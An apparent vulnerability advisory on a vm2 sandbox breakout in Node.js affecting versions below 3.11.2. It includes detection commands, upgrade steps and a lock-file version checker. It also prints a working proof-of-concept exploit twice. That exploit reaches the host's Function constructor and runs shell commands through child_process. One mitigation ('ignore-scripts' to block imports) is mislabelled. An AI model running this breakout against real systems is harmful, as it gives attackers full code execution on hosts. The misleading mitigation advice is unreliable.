How the Vulnerability Works
The flaw lies in the `handleException` function, specifically in a hardening commit that followed GHSA-mpf8. When code inside the sandbox throws an exception whose prototype is `null` (an object created with `__proto__: null`), the deserialization logic mishandles it: instead of treating the value as a plain sandbox object, it assumes the null-prototype exception originated on the host side and should be proxied back. An attacker who catches that exception inside the sandbox therefore gains access to both the proxied (wrapped) and the unproxied (raw) versions of the object. By attaching a host function, such as the `inspect` method from `Buffer.prototype`, to the caught exception, the attacker obtains a reference to the host's raw `Function` constructor, and with that the sandbox can be bypassed entirely to execute arbitrary system commands on the host machine. The following proof-of-concept (PoC) demonstrates the breakout:
const { VM } = require('vm2');
const vm = new VM();
console.log(vm.run(`const o = { __proto__: null };
try { throw o; } catch (e) {
  e.f = Buffer.prototype.inspect;
  const proc = e.f.constructor('return process')();
  proc.mainModule.require('child_process').execSync('touch pwned');
}`));
(Source: SecAlerts CVE-2026-44009)
When executed, this code creates the file `pwned` on the host system, proving that code run inside the sandbox is not isolated.
DailyCVE Form
Platform: Node.js VM2
Version: <3.11.2
Vulnerability: Sandbox Breakout
Severity: Critical
Date: 2026-05-08
Prediction: 2026-05-09
What Undercode Says:
Analytics
Check the installed version
npm list vm2 | grep vm2@
Monitor for attempts in real time (lists the PID of any process whose stdout contains the PoC's command)
grep -il "touch pwned" /proc/[0-9]*/fd/1 2>/dev/null | awk -F/ '{print "PID:", $3}'
Count potential exploitation attempts (the pattern tolerates both `{VM}` and `{ VM }` spacing)
grep -cE 'const \{ ?VM ?\} = require' /var/log/app/app.log
Exploit
// Full exploit chain
const { VM } = require('vm2');
const vm = new VM();
vm.run(`const o = { __proto__: null };
try { throw o; }
catch (e) {
  e.f = Buffer.prototype.inspect;
  const proc = e.f.constructor('return process')();
  proc.mainModule.require('child_process').execSync('id > /tmp/owned');
}`);
Protection
Upgrade to the patched version:
npm install vm2@3.11.2
Block vulnerable imports (alternative measure):
npm config set ignore-scripts true
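`npm list vm2` shows a version but does not compare it, and a project can carry a second, nested copy of vm2 under another dependency that the top-level entry hides. As an added example that is not code from the original post or from the vm2 project, the script below reads a package-lock.json, collects every vm2 entry (top-level and nested) and flags each one below 3.11.2 with a numeric semver comparison. It goes a little beyond the page's `npm list` check by handling both the lockfileVersion 2/3 `packages` map and the older v1 `dependencies` tree. The lock file contents, package names and the `check-vm2.js` file name are constructed assumptions.

```javascript
// Added example (not code from the original post or the vm2 project): locate
// every vm2 copy recorded in a package-lock.json, including nested duplicates
// under other dependencies, and flag each one below the fixed version.
// Handles the lockfileVersion 2/3 "packages" map and the older v1 "dependencies"
// tree. The lock file content below is constructed for this example.
const FIXED_VERSION = '3.11.2';

// Parse "MAJOR.MINOR.PATCH" (optional leading "v"); pre-release/build tags are ignored.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v));
  if (!m) throw new Error(`not a semver version: ${v}`);
  return m.slice(1, 4).map(Number);
}

// Numeric comparison: 3.9.19 < 3.11.2, which a plain string comparison gets wrong.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// v1 lock files nest installed packages under "dependencies".
function collectV1(deps, prefix, out) {
  for (const [name, meta] of Object.entries(deps || {})) {
    const path = `${prefix}node_modules/${name}`;
    if (name === 'vm2' && meta.version) out.push({ path, version: meta.version });
    collectV1(meta.dependencies, `${path}/`, out);
  }
}

// Returns [{ path, version, vulnerable }] for every vm2 entry in the lock file.
function findVm2(lockJson, fixed = FIXED_VERSION) {
  const lock = typeof lockJson === 'string' ? JSON.parse(lockJson) : lockJson;
  const entries = [];
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path !== '' && path.endsWith('node_modules/vm2') && meta.version) {
        entries.push({ path, version: meta.version });
      }
    }
  } else {
    collectV1(lock.dependencies, '', entries);
  }
  return entries.map((e) => ({ ...e, vulnerable: compareVersions(e.version, fixed) < 0 }));
}

// For real use: node check-vm2.js ./package-lock.json (file name is assumed).
function checkLockFile(file) {
  return findVm2(require('fs').readFileSync(file, 'utf8'));
}

// Constructed sample: the app's own vm2 is outdated, while a library pins a fixed copy.
const SAMPLE_LOCK = JSON.stringify({
  name: 'example-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', dependencies: { vm2: '^3.9.0', 'some-lib': '^1.0.0' } },
    'node_modules/vm2': { version: '3.9.19' },
    'node_modules/some-lib': { version: '1.0.0', dependencies: { vm2: '3.11.2' } },
    'node_modules/some-lib/node_modules/vm2': { version: '3.11.2' },
  },
});

if (typeof require !== 'undefined' && require.main === module) {
  const results = process.argv[2] ? checkLockFile(process.argv[2]) : findVm2(SAMPLE_LOCK);
  for (const r of results) {
    console.log(`${r.vulnerable ? 'VULNERABLE' : 'ok        '} ${r.path} (${r.version})`);
  }
}
```

Without an argument the script reports on the constructed sample (the top-level 3.9.19 copy is flagged, the nested 3.11.2 copy is not); with a path it reads that lock file. Note that the fix is "upgrade every copy": a nested outdated vm2 pulled in by a library is just as reachable as the top-level one, so the check lists all of them.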
Impact
Attackers can achieve full Remote Code Execution (RCE): arbitrary commands, file modifications, and complete compromise of the host system. The vulnerability affects all versions before 3.11.2 and carries a CVSS score of 10.0 (Critical). A sandbox designed to safely run untrusted code provides no isolation against this flaw, and no mitigation exists other than upgrading to the fixed version.
Sources:
Reported By: github.com